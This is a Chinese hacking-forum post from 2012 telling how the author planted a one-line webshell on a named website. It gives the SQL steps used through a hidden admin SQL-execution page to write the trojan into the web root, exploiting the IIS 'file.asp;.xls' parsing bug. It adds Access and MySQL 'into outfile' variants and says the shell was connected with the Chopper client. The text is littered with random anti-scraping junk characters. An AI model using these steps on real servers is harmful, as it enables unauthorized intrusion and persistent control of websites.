好不容易进了后台,发现啥上传啊。备份啊多木有。( s# ~- S/ h0 k6 g+ I: C
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的$ z5 a; n/ D' \' }! V; N. o
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
! z5 z3 [! N6 [' Z. v然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
. d7 \5 T: W$ C$ L6 a1.create table cmd (a varchar(50))1 \0 |: k: U* C& k
2.insert into cmd (a) values (‘‘)7 x l2 _. Z3 y4 }- O1 e; q
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
3 [6 i2 F. }2 H6 z* G4 @(把表cmd的内容导出为物理路径的一个EXCEL文件)- H4 o( E5 C; V' j% ]% h
4.drop table cmd
9 ~0 I4 ?0 }6 g2 c a( B4 d) _利用IIS的BUG成功拿到了WEBSHELL。
2 ~& i3 K# s# w) g2 o& c' t" E) h" K- J7 S" [6 x$ V9 H
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
% X5 i$ X' b5 D- T6 S q
" ]7 x1 n( K4 ? K8 A/ T$ d SQL语句意思解释:0 k& E: V7 F; f
第一句) w1 M; b5 \( [# Y7 Y
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
+ m* t! A$ F6 n0 W+ o2 {6 S. Z, ]( v& R, y J& z
第二句+ T! i0 K- E; v& A8 ]! q. u# d
在表cmd的a字段插入一句话木马) t( e: J' N- j
第三句. _9 c- p0 f7 i8 H2 H% p
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件 S/ C9 X4 A# C6 X8 E
8 h0 k/ p5 n$ x
第四句
& j1 R- ~# T; v8 F! f 删除建立的cmd表/ j. Z$ r" k' h5 a/ o* s5 v
6 c2 m% }3 n- K; O) K5 @% [8 g! [
以下内容为测试:' Q; t+ t: V1 F) L
Access利用后台SQL执行命令功能导出WebShell:; {3 r1 G4 c' S
这个更简单:4 N0 G; c7 z& h/ V0 o
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
0 U' ^, J; ^! m% y* d" w) w 或者
3 V& g6 E9 x2 \3 @/ y9 s2 w [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
U4 j. z9 e( G2 c1 g8 J4 K" z) Q% h2 L
后台有执行SQL语句功能(vote为已知表段)
9 C+ p, `4 M P8 G: e+ L 希望对大家有所帮助拿shell的又一个思路
: J- k/ g. C- e4 G- R+ y$ G |
发表于 2012-9-13 17:53:58
收藏
支持
反对